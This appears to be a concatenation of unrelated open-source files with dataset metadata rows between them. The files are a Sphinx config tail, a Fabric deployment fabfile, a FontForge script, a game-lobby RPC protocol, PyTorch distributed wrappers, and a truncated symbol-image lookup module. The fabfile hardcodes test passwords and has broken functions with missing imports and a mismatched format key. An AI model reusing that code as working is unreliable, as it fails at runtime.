# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'django-rest-assureddoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'django-rest-assured.tex', u'django-rest-assured Documentation',
u'Yehonatan Daniv', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'django-rest-assured', u'django-rest-assured Documentation',
[u'Yehonatan Daniv'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'django-rest-assured', u'django-rest-assured Documentation',
u'Yehonatan Daniv', 'django-rest-assured', 'Instantly test-cover your Django REST Framework based API.',
'testing'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
autodoc_member_order = 'bysource'
| bsd-2-clause | 9,114,272,420,712,339,000 | 30.966543 | 107 | 0.711362 | false |
chop-dbhi/omop_harvest | fabfile.py | 1 | 18855 | from __future__ import print_function, with_statement
import os
import sys
import stat
import json
import etcd
from functools import wraps
from fabric.api import *
from fabric.colors import red, yellow, white, green
from fabric.contrib.console import confirm
from fabric.contrib.files import exists
__doc__ = """\
Help Doc
"""
# A few setup steps and environment checks
curdir = os.path.dirname(os.path.abspath(__file__))
config_file = os.path.join(curdir, '.project_config.json')
try:
project_config = json.loads(open(config_file, 'r').read())
except:
project_config = {
"etcd_host": env.etcd_host,
"docker_registry":env.registry_host
}
hidden_output = []
try:
venv_wrap_path = os.environ['WORKON_HOME']
except KeyError:
venv_wrap_path = None
if venv_wrap_path and os.path.exists(os.path.join(venv_wrap_path, 'omop_harvest')):
full_env_path = os.path.join(venv_wrap_path, 'omop_harvest')
else:
full_env_path = os.path.abspath('..')
venv_wrap_path = None
def get_hosts_settings():
# TODO: Will probably have to retain this to support legacy deploy.
# Load all the host settings
try:
hosts = json.loads(open(config_file).read())['hosts']
except KeyError:
abort(red('Error: No host settings are defined in the project configuration'))
# Pop the default settings
# Pre-populated defaults
# for host in hosts:
# base = base_settings.copy()
# base.update(default_settings)
# print(hosts)
# base.update(hosts[host])
# hosts[host] = base
return hosts
# ** Decorators
def virtualenv(path, venv_wrap):
"Wraps a function and prefixes the call with the virtualenv active."
if path is None:
activate = None
else:
activate = os.path.join(path, 'bin/activate')
def decorator(func):
@wraps(func)
def inner(*args, **kwargs):
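            # Three execution modes: virtualenvwrapper ("workon"), a plain
            # virtualenv activated via its activate script, or no virtualenv.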
if venv_wrap:
with prefix('source /usr/local/bin/virtualenvwrapper.sh'):
with prefix('workon {0}'.format('omop_harvest')):
return func(*args, **kwargs)
            elif path is not None and venv_wrap is None:
with prefix('source {0}'.format(activate)):
return func(*args, **kwargs)
else:
return func(*args, **kwargs)
return inner
return decorator
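# See harvest_bootstrap() further below for this decorator in use; it wraps
# local manage.py calls so they run inside the project virtualenv.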
def host_context(func):
"Sets the context of the setting to the current host"
@wraps(func)
def decorator(*args, **kwargs):
hosts = get_hosts_settings()
with settings(**hosts[env.host]):
return func(*args, **kwargs)
return decorator
# ---------------------------------------------------------------
# Configuration Commands
# ---------------------------------------------------------------
def set_configuration(noinput=False):
'''
Takes the settings in .project_config.json file and writes them to the
appropriate etcd endpoint for this application.
    fab set_configuration:noinput=True will not prompt for confirmation
'''
client = etcd.Client(host=project_config['etcd_host'])
config = json.loads(open('.project_config.json', 'r').read())
if noinput or confirm("Are you sure you want to upload your local settings?"):
client.write('/applications/omop_harvest/configuration', json.dumps(config))
def get_configuration(noinput=False):
'''
Retrieves the applications settings from etcd and generates a local settings file.
fab get_configuration:noinput=True will not prompt for confirmation
'''
client = etcd.Client(host=project_config['etcd_host'])
try:
etcd_config = client.read('/applications/omop_harvest/configuration')
except KeyError:
abort(red('Error: No host settings found on etcd'))
configuration = json.loads(etcd_config.value)
if configuration == {}:
print(red('Empty configuration found. Aborting'))
sys.exit(1)
# Establish the configuration locally
if noinput or confirm('Are you sure you want to overwrite your local settings?'):
f = open('.project_config.json', 'w')
f.write(json.dumps(configuration, indent=4, sort_keys=True))
f.close()
# ---------------------------------------------------------------
# Docker Commands
# ---------------------------------------------------------------
# TODO:
# - Continuous Integration. Automatic provisioning of services
def build_container(noinput=False):
# Check git status to make sure our build hash matches our git commit
index_status = local('git status --porcelain', capture=True)
if index_status != '':
abort('Please commit or stash any changes to git before building your container')
try:
get_configuration(noinput)
except:
if not confirm('Unable to retrieve configuration. Would you like to attempt to build this container with locally available settings?'):
sys.exit(1)
git_hash = local('git rev-parse --short HEAD', capture=True)
git_branch = local('git rev-parse --abbrev-ref HEAD', capture=True)
local('docker build -t omop_harvest-{0}:{1} .'.format(git_branch, git_hash))
def test_container():
git_hash = local('git rev-parse --short HEAD', capture=True)
git_branch = local('git rev-parse --abbrev-ref HEAD', capture=True)
#local('docker run -i -t -e APP_ENV=test omop_harvest-{0}:{1} test'.format(git_branch, git_hash))
#Temporary: Anticipating new version of ATI Template
local('docker run --link memcache:mc -d -p :8000 -e CID_ENV={0} -e APP_ENV={1} omop_harvest-{2}:{3} test'.format(
env.cid_env,
env.host,
git_branch,
git_hash)
)
#
def build_and_test():
build_container(noinput=True)
test_container()
# Remote Deployment Commands
def pull_repo():
    git_branch = local('git rev-parse --abbrev-ref HEAD', capture=True)
    local('docker pull {0}/omop_harvest-{1}'.format(project_config['docker_registry'], git_branch))
def push_to_repo():
git_hash = local('git rev-parse --short HEAD', capture=True)
git_branch = local('git rev-parse --abbrev-ref HEAD', capture=True)
try:
with hide('output'):
local("docker inspect --format='{{{{.id}}}}' omop_harvest-{0}:{1}".format(git_branch, git_hash))
except:
if confirm('Could not find most most recent container. Would you like to build it?'):
build_container()
local('docker tag omop_harvest-{0}:{1} {2}/omop_harvest-{0}:{1}'.format(git_branch, git_hash, project_config['docker_registry']))
local('docker tag omop_harvest-{0}:{1} {2}/omop_harvest-{0}:latest'.format(git_branch, git_hash, project_config['docker_registry']))
local('docker push {0}/omop_harvest-{1}'.format(project_config['docker_registry'], git_branch))
local('docker rmi -f {0}/omop_harvest-{1}:{2}'.format(project_config['docker_registry'], git_branch, git_hash))
@host_context
def deploy(commit='latest'):
run('docker pull {0}/omop_harvest-{1}:{2}'.format(project_config['docker_registry'], env.git_branch, commit))
#container = run('docker run -d -p :8000 -e APP_ENV={0} {1}/omop_harvest-{2}:{3} start'.format(
# env.host,
# project_config['docker_registry'],
# env.git_branch,
# commit)
#)
#Temporary: Anticipating new version of ATI Template
container = run('docker run --hostname=omop-harvest-{2}-{3} --link memcache:mc -d -p :8000 -e CID_ENV={4} -e APP_ENV={0} {1}/omop_harvest-{2}:{3} start'.format(
env.host,
project_config['docker_registry'],
env.git_branch,
commit,
env.cid_env)
)
#
port = run("docker inspect --format='{{{{range $p, $conf := .NetworkSettings.Ports}}}}{{{{(index $conf 0).HostPort}}}} {{{{end}}}}' {0}".format(container))
commit_msg = local('git --no-pager log --oneline -1', capture = True)
auth_token = project_config['hipchat']['auth_token']
deploy_msg = 'omop_harvest-{0}:{1} now deployed at http://{2}:{3} <a href="http://{2}:{3}">Open</a> <a href="http://{4}:4001/v2/keys/applications/omop_harvest/status">Status</a> -- {5}'.format(env.git_branch, commit, env.host_string, port, project_config['etcd_host'], commit_msg)
# Notifications
local('curl -d "room_id=529405&from=deployservice&color=yellow" --data-urlencode message="{deploy_msg}" https://cbmi.hipchat.com/v1/rooms/message?auth_token={auth_token}'.format(
deploy_msg=deploy_msg,
auth_token=auth_token
))
client = etcd.Client(host=project_config['etcd_host'])
client.write('/applications/omop_harvest/status/{0}/latest_commit'.format(env.git_branch), commit)
client.write('/applications/omop_harvest/status/{0}/latest_deploy'.format(env.git_branch), 'http://{0}:{1}'.format(env.host_string, port))
print(green('Now Running at http://{0}:{1}'.format(env.host_string, port)))
@host_context
def setup_env():
"Sets up the initial environment."
parent, project = os.path.split(env.path)
if not exists(parent):
        run('mkdir -p {}'.format(parent))
with cd(parent):
if not exists(project):
run('git clone {repo_url} {project}'.format(project=project, **env))
with cd(project):
run('git checkout {git_branch}'.format(**env))
run('git pull origin {git_branch}'.format(**env))
else:
with cd(project):
run('git checkout {git_branch}'.format(**env))
run('git pull origin {git_branch}'.format(**env))
# ---------------------------------------------------------------
# Template Bootstrap Hooks
# ---------------------------------------------------------------
@virtualenv(full_env_path, venv_wrap_path)
def harvest_bootstrap():
# Handle Settings Configuration
# TODO:
# Perhaps at this point we go out to etcd and
# find the relavent DB connection settings if
# they exist then we use those here... otherwise
# we fall back to the default sqlite stuff
print('Setup default configuration file')
with hide(*hidden_output):
local('mv .project_config.json.sample .project_config.json')
print('Make test script executable')
mode = stat.S_IMODE(os.stat('run-tests.sh').st_mode)
executable = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
os.chmod('run-tests.sh', mode | executable)
# Sync DB
print(green('- Creating SQLiteDB.'))
with hide(*hidden_output):
local('./bin/manage.py syncdb --settings=omop_harvest.conf.local')
# Collect Static
print(green('- Collecting Static Files'))
with hide(*hidden_output):
local('./bin/manage.py collectstatic --noinput --settings=omop_harvest.conf.local')
# Migrations
print(green('- Run Migrations'))
with hide(*hidden_output):
local('./bin/manage.py migrate --noinput --settings=omop_harvest.conf.local')
# ---------------------------------------------------------------
# Testing and Continuous Integration Commands
# ---------------------------------------------------------------
def check_for_config(noinput):
if 'project_settings' not in project_config.keys():
if noinput or confirm(red("No configuration found. Would you like to download this applications configuration?")):
get_configuration(noinput=True)
def check_for_pg(database):
'''
Check the current Docker host for an existing instance of the specified
database. If found returns the container ID.
'''
with hide('output', 'running', 'warnings'), settings(warn_only=True):
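        # awk prints the first column (the container ID) of every "docker ps -a"
        # row whose name matches; multiple IDs come back newline-separated.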
res = local("docker ps -a | awk '/{0}/ {{ print $1 }}'".format(database), capture=True)
if res:
return res.split("\n")
else:
return None
def check_for_mc():
'''
Check the current Docker host for an existing instance of memcache. If
found returns the container ID.
'''
with hide('output', 'running', 'warnings'), settings(warn_only=True):
res = local("docker ps | awk '/memcache/ { print $1 }'", capture=True)
if res:
print(green('Found Memcache running at {0}'.format(res)))
return res.split("\n")
else:
return None
def test_setup(noinput=False):
'''
Examine the project for a proper configuration file.
Examine the existing environment for Harvest app's service dependencies
    (Memcache and Postgres). If they do not exist, create them as containers,
build the application container and apply ETL command from the application
to the Postgres DB.
After the data load is complete, attach the application to the Postgres
container and to Memcache. Apply normal bootstrapping procedures (syncdb,
migrations, collectstatic) and load fixture container test user "cbmi" with
default password "chopchop"
'''
DB_CONTAINER_NAME = 'omop_harvest_test_db'
check_for_config(noinput)
dbs = check_for_pg(DB_CONTAINER_NAME)
if dbs:
if noinput or confirm(yellow('It looks like you might already have an instance running on this machine. Do you want to stop and remove the existing containers?')):
with hide('output', 'running'):
print(red('Stopping and removing associated Harvest application containers.'))
local("docker ps -a | awk '/(omop_harvest_test:|omop_harvest_test_db)/ { print $1 }' | xargs docker stop")
local("docker ps -a | awk '/(omop_harvest_test:|omop_harvest_test_db)/ { print $1 }' | xargs docker rm")
mc = check_for_mc()
if not mc:
with hide('output', 'running'):
print(green('Starting Memcached Container...'))
local("docker run -d --name memcache ehazlett/memcached")
with hide('output', 'running', 'warnings'):
# Spin up a fresh Postgres instance:
print(green('Starting Postgres Container...'))
pg_container = local('docker run -p :5432 -d --name omop_harvest_test_db {registry_host}:5000/postgresql'.format(hosts=project_config['registry_host']), capture=True)
port = local("docker inspect --format='{{{{range $p, $conf := .NetworkSettings.Ports}}}}{{{{(index $conf 0).HostPort}}}} {{{{end}}}}' {0}".format(pg_container), capture=True)
time.sleep(2)
# Create DB and User in fresh DB
print(green('Prepare Postgres DB...'))
local('export PGPASSWORD=docker && createdb -h localhost -p {port} -U docker omop_harvest'.format(port=port))
conn = psycopg2.connect(host='localhost', port=port, user='docker', password='docker', database='postgres')
conn.cursor().execute("create user omop_harvest with password 'docker'; ")
conn.commit()
conn.close()
# Build the Application Container to facilitate ETL:
print(green('Building Application Container...'))
local('docker build -t omop_harvest_test .')
# Run ETL on attached Postgres DB
print(green('Start ETL on attached DB'))
local('docker run --link omop_harvest_test_db:db -e APP_ENV=test --name omop_harvest_etl omop_harvest_test etl')
# Wait for ETL process to finish
local('docker wait omop_harvest_etl')
print(green('ETL Complete.'))
local('docker rm omop_harvest_etl')
# Start the application container
print(green('Start Application Container...'))
omop_harvest = local('docker run -d --link omop_harvest_test_db:db --link memcache:mc -p :8000 -e APP_ENV=test --name omop_harvest_test_app omop_harvest_test debug', capture=True)
omop_harvest_port = local("docker inspect --format='{{{{range $p, $conf := .NetworkSettings.Ports}}}}{{{{(index $conf 0).HostPort}}}} {{{{end}}}}' {0}".format(omop_harvest), capture=True)
# Sleep to give syncdb and migrations time to run.
time.sleep(10)
print(red('\n***\nomop_harvest Test Instance now running on: http://{0}:{1}'.format(socket.gethostname(), omop_harvest_port)))
def ci_setup(noinput=False):
"Copy down the production omop_harvest database to a fresh postgres container."
# TODO
# - Make sure configuration file exists.
DB_CONTAINER_NAME = 'omop_harvest_ci_pg'
check_for_config(noinput)
dbs = check_for_pg(DB_CONTAINER_NAME)
if dbs:
if noinput or confirm(yellow('It looks like you might already have an instance running on this machine. Do you want to stop and remove the existing containers?')):
with hide('output', 'running'):
print(red('Stopping and removing associated Harvest application containers.'))
local("docker ps -a | awk '/(omop_harvest_test:|omop_harvest_test_db)/ { print $1 }' | xargs docker stop")
local("docker ps -a | awk '/(omop_harvest_test:|omop_harvest_test_db)/ { print $1 }' | xargs docker rm")
# Spin up a fresh postgres instance:
with hide('output', 'running', 'warnings'):
print(green('Starting Postgres Container...'))
pg_container = local('docker run -p :5432 -d --name omop_harvest_ci_db {registry_host}:5000/postgresql'.format(hosts=project_config['registry_host']), capture=True)
port = local("docker inspect --format='{{{{range $p, $conf := .NetworkSettings.Ports}}}}{{{{(index $conf 0).HostPort}}}} {{{{end}}}}' {0}".format(pg_container), capture=True)
time.sleep(2)
print(green('Dump Production DB...'))
db = parse_db(project_config['project_settings']['production']['databases']['default'])
local('export PGPASSWORD={password} && pg_dump -h {host} -U {user} -Fc {database} > tmp.dump'.format(**db))
time.sleep(2)
print(green('Prepare Postgres DB...'))
local('export PGPASSWORD=docker && createdb -h localhost -p {port} -U docker omop_harvest'.format(port=port))
conn = psycopg2.connect(host='localhost', port=port, user='docker', password='docker', database='postgres')
conn.cursor().execute("create user omop_harvest with password 'docker'; ")
conn.commit()
conn.close()
print(green('Restoring Backup to Container...'))
local('export PGPASSWORD=docker && pg_restore -h localhost -p {port} -U docker -d omop_harvest tmp.dump'.format(port=port))
local('rm tmp.dump')
print(green('Building Application Container...'))
local('docker build -t omop_harvest_test .')
print(green('Start Application Container...'))
omop_harvest = local('docker run -d --link omop_harvest_ci_db:db -p :8000 -e APP_ENV=ci --name omop_harvest_ci omop_harvest start', capture=True)
omop_harvest_port = local("docker inspect --format='{{{{range $p, $conf := .NetworkSettings.Ports}}}}{{{{(index $conf 0).HostPort}}}} {{{{end}}}}' {0}".format(omop_harvest), capture=True)
print(red('\n***\nomop_harvest Production Clone now running on: http://localhost:{0}'.format(omop_harvest_port)))
| bsd-2-clause | -3,427,390,257,368,080,400 | 42.146453 | 284 | 0.627208 | false |
jkriege2/JKQtPlotter | lib/jkqtmathtext/resources/xits/tools/copy-math-from-amiri.py | 2 | 1252 | import sys
import fontforge
amiri = fontforge.open(sys.argv[1])
xits = fontforge.open(sys.argv[2])
amiri.em = 1000
amiri.layers[1].is_quadratic = 0
amiri.selection.all()
amiri.unlinkReferences()
names = []
alts = []
for aglyph in amiri.glyphs():
u = aglyph.unicode
if (u in range(0x1EE00, 0x1EF00) or
u in range(0x0660, 0x066E) or
u in range(0x06F0, 0x06FA) or
u in range(0x0608, 0x060B) or
u == 0x060C):
names.append(aglyph.name)
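# Second pass: collect the ".alt..." variants of the glyphs gathered above.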
for aglyph in amiri.glyphs():
for name in names:
if aglyph.name != name and aglyph.name.startswith(name + ".alt"):
alts.append(aglyph.name)
for name in names + alts:
aglyph = amiri[name]
if aglyph.name not in xits:
xits.createChar(aglyph.unicode, aglyph.name)
xglyph = xits[aglyph.name]
aglyph.draw(xglyph.glyphPen())
xglyph.width = aglyph.width
xglyph.round()
xglyph.autoHint()
for name in alts:
base, ext = name.split(".")
if ext.startswith("alt"):
xits[base].addPosSub("'cv01' Alternate Arabic Math symbols-1", name)
elif ext.startswith("display"):
xits[base].verticalVariants = (xits[base], xits[name])
else:
print "Unknown alternate glyph:", name
xits.save()
| lgpl-2.1 | -6,084,916,335,181,398,000 | 24.55102 | 76 | 0.640575 | false |
pcdummy/wzlobbyserver-ng | wzlobby/protocol/protocol4.py | 1 | 6682 | # -*- coding: utf-8 -*-
# vim: set et sts=4 sw=4 encoding=utf-8:
#
# This file is part of Warzone 2100.
# Copyright (C) 2011 Warzone 2100 Project
#
# Warzone 2100 is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Warzone 2100 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Warzone 2100; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
###############################################################################
# This is the V4 Variant of the Protocol - BSON.
__all__ = ['Protocol4']
from twisted.internet import defer
from twisted.python import log
from socketrpc.twisted_srpc import SocketRPCProtocol, set_serializer, Fault
from wzlobby import settings
set_serializer('jsonlib')
NO_GAME = -402
NOT_ACCEPTABLE = -403
WRONG_LOGIN = -404
LOGIN_REQUIRED = -405
SESSION_INVALID = -406
class Protocol4(SocketRPCProtocol):
game = None
lobbyVersion = 4
def connectionMade(self):
SocketRPCProtocol.connectionMade(self)
self.debug = settings.debug
self.gameDB = self.factory.gameDB
self.db = self.factory.db
self.authenticated = False
def dispatch_call(self, method, id, args, kwargs):
if not self.authenticated \
and settings.login_required \
and method != 'login':
log.msg('Not executing %s - login required' % method)
return defer.fail(
Fault(LOGIN_REQUIRED, "Please login first!")
)
log.msg('executing docall_%s' % method)
return SocketRPCProtocol.dispatch_call(self, method, id, args, kwargs)
def docall_login(self, username, password=None, token=None):
def check_pass_cb(result):
# Login ok
self.authenticated = True
return result
def check_pass_eb(failure):
self.authenticated = False
return defer.fail(Fault(WRONG_LOGIN, "Password login failed, unknown user or wrong password!"))
def check_token_cb(result):
# Token login ok
self.authenticated = True
return result
def check_token_eb(failure):
self.authenticated = False
return defer.fail(Fault(WRONG_LOGIN, "Token login failed, unknown user or wrong password!"))
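        # No token supplied: authenticate with username/password; otherwise
        # validate the supplied login token instead.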
if token is None:
d = self.db.check_user_password(username, password, self.transport.getPeer().host)
d.addCallbacks(check_pass_cb, check_pass_eb)
else:
d = self.db.check_user_token(username, token, self.transport.getPeer().host)
d.addCallbacks(check_token_cb, check_token_eb)
return d
def docall_logout(self):
self.authenticated = False
return defer.succeed("")
def docall_addGame(self, *args, **kwargs):
def checkFailed(reason):
return defer.fail(
Fault(
NOT_ACCEPTABLE,
reason.getErrorMessage()
)
)
def checkDone(result):
self.gameDB.register(game)
log.msg('new game %d: "%s" from "%s".' % (game['gameId'],
game['description'].encode('utf8'),
game['hostplayer'].encode('utf8')))
return {"gameId": game['gameId'],
"result": result}
game = self.gameDB.create(self.lobbyVersion)
# Update the game with the received data
for k, v in kwargs.iteritems():
try:
game[k] = v
except KeyError:
pass
# Add hosts ip
game['host'] = self.transport.getPeer().host
d = self.gameDB.check(game)
d.addCallback(checkDone)
d.addErrback(checkFailed)
return d
def docall_delGame(self, gameId):
game = self.gameDB.get(gameId, False)
if not game:
return defer.fail(
Fault(NO_GAME, 'Game %d does not exists' % gameId)
)
self.gameDB.remove(game)
return defer.succeed('')
def docall_addPlayer(self, gameId, slot, name, username, session):
def check_cb(result):
if result:
game['currentPlayers'] += 1
return defer.succeed('')
else:
return defer.fail(Fault(SESSION_INVALID, 'Users session is invalid!'))
game = self.gameDB.get(gameId, False)
if not game:
return defer.fail(
Fault(NO_GAME, 'Game %d does not exists' % gameId)
)
d = self.db.check_user_session(username, session)
d.addCallback(check_cb)
return d
def docall_delPlayer(self, gameId, slot):
game = self.gameDB.get(gameId, False)
if not game:
return defer.fail(
Fault(NO_GAME, 'Game %d does not exists' % gameId)
)
game['currentPlayers'] -= 1
return defer.succeed('')
def docall_updatePlayer(self, gameId, slot, name):
return defer.succeed('')
def docall_list(self, maxgames=9999):
        maxgames = int(maxgames)
games = []
for game in self.gameDB.itervalues():
# Skip empty games.
if not game['description']:
continue
games.append({
"host" : game["host"],
"port" : game["port"],
"description" : game["description"],
"currentPlayers" : game["currentPlayers"],
"maxPlayers" : game["maxPlayers"],
"multiVer" : game["multiVer"],
"wzVerMajor" : game["wzVerMajor"],
"wzVerMinor" : game["wzVerMinor"],
"isPrivate" : game["isPrivate"],
"modlist" : game["modlist"],
"mapname" : game["mapname"],
"hostplayer" : game["hostplayer"],
})
maxgames -= 1
if maxgames == 0:
                break
return defer.succeed(games)
| gpl-2.0 | 7,357,415,535,087,798,000 | 29.372727 | 107 | 0.550883 | false |
RPGOne/Skynet | pytorch-master/torch/distributed/collectives.py | 1 | 2102 | import torch
class reduce_op(object):
SUM = object()
PRODUCT = object()
MAX = object()
MIN = object()
class group(object):
WORLD = object()
class _DistributedRequest(object):
def __init__(self, request):
self.request = request
def is_completed(self):
return torch._C._dist_request_is_completed(self.request)
def wait(self):
torch._C._dist_request_wait(self.request)
def get_rank():
return torch._C._dist_get_rank()
def get_num_processes():
return torch._C._dist_get_num_processes()
def isend(tensor, dst_rank):
return _DistributedRequest(torch._C._dist_isend(tensor, dst_rank))
def irecv(tensor, src_rank):
return _DistributedRequest(torch._C._dist_irecv(tensor, src_rank))
def send(tensor, dst_rank):
return torch._C._dist_send(tensor, dst_rank)
def recv(tensor, src_rank=None):
if src_rank is None:
return torch._C._dist_recv_any_source(tensor)
return torch._C._dist_recv(tensor, src_rank)
def broadcast(tensor, src_rank, group=group.WORLD):
return torch._C._dist_broadcast(tensor, src_rank, group)
def all_reduce(tensor, op=reduce_op.SUM, group=group.WORLD):
return torch._C._dist_all_reduce(tensor, op, group)
def reduce(tensor, dst_rank, op=reduce_op.SUM, group=group.WORLD):
return torch._C._dist_reduce(tensor, dst_rank, op, group)
def all_gather(tensors, tensor, group=group.WORLD):
return torch._C._dist_all_gather(tensors, tensor, group)
def gather_send(tensor, dst_rank, group=group.WORLD):
return torch._C._dist_gather_send(tensor, dst_rank, group)
def gather_recv(tensors, tensor, group=group.WORLD):
return torch._C._dist_gather_recv(tensors, tensor, group)
def scatter_send(tensors, tensor, group=group.WORLD):
return torch._C._dist_scatter_send(tensors, tensor, group)
def scatter_recv(tensor, src_rank, group=group.WORLD):
return torch._C._dist_scatter_recv(tensor, src_rank, group)
def barrier(group=group.WORLD):
return torch._C._dist_barrier(group)
def new_group(ranks):
return torch._C._dist_new_group(ranks)
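# Illustrative sketch (not part of the original module), assuming the process
# group has already been initialised elsewhere:
#
#   t = torch.ones(4)
#   all_reduce(t)   # element-wise sum of t across all processes (default op)
#   barrier()       # wait for every process to reach this point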
| bsd-3-clause | 4,712,149,255,523,797,000 | 22.617978 | 70 | 0.685062 | false |
getsentry/symsynd | symsynd/images.py | 1 | 4038 | import os
import bisect
from symsynd.libdebug import get_cpu_name, DebugInfo
from symsynd.exceptions import DebugInfoError
from symsynd.utils import timedsection, parse_addr
from symsynd._compat import string_types, itervalues
def get_image_cpu_name(image):
cpu_name = image.get('cpu_name')
if cpu_name is not None:
return cpu_name
return get_cpu_name(image['cpu_type'], image['cpu_subtype'])
def find_debug_images(dsym_paths, binary_images):
"""Given a list of paths and a list of binary images this returns a
dictionary of image addresses to the locations on the file system for
all found images.
"""
images_to_load = set()
with timedsection('iterimages0'):
for image in binary_images:
if get_image_cpu_name(image) is not None:
images_to_load.add(image['uuid'].lower())
images = {}
# Step one: load images that are named by their UUID
with timedsection('loadimages-fast'):
for uuid in list(images_to_load):
for dsym_path in dsym_paths:
fn = os.path.join(dsym_path, uuid)
if os.path.isfile(fn):
images[uuid] = fn
images_to_load.discard(uuid)
break
# Otherwise fall back to loading images from the dsym bundle. Because
    # this loading strategy is pretty slow, we don't actually want to use it
# unless we have a path that looks like a bundle. As a result we
# find all the paths which are bundles and then only process those.
if images_to_load:
slow_paths = []
for dsym_path in dsym_paths:
if os.path.isdir(os.path.join(dsym_path, 'Contents')):
slow_paths.append(dsym_path)
with timedsection('loadimages-slow'):
for dsym_path in slow_paths:
dwarf_base = os.path.join(dsym_path, 'Contents',
'Resources', 'DWARF')
if os.path.isdir(dwarf_base):
for fn in os.listdir(dwarf_base):
# Looks like a UUID we loaded, skip it
if fn in images:
continue
full_fn = os.path.join(dwarf_base, fn)
try:
di = DebugInfo.open_path(full_fn)
except DebugInfoError:
continue
for variant in di.get_variants():
uuid = str(variant.uuid)
if uuid in images_to_load:
images[uuid] = full_fn
images_to_load.discard(uuid)
rv = {}
# Now resolve all the images.
with timedsection('resolveimages'):
for image in binary_images:
cpu_name = get_image_cpu_name(image)
if cpu_name is None:
continue
uid = image['uuid'].lower()
if uid not in images:
continue
rv[parse_addr(image['image_addr'])] = images[uid]
return rv
class ImageLookup(object):
"""Helper object to locate images."""
def __init__(self, images):
self._image_addresses = []
self.images = {}
for img in images:
img_addr = parse_addr(img['image_addr'])
self._image_addresses.append(img_addr)
self.images[img_addr] = img
self._image_addresses.sort()
def iter_images(self):
return itervalues(self.images)
def get_uuids(self):
return list(self.iter_uuids())
def iter_uuids(self):
for img in self.iter_images():
yield img['uuid']
def find_image(self, addr):
"""Given an instruction address this locates the image this address
is contained in.
"""
idx = bisect.bisect_left(self._image_addresses, parse_addr(addr))
if idx > 0:
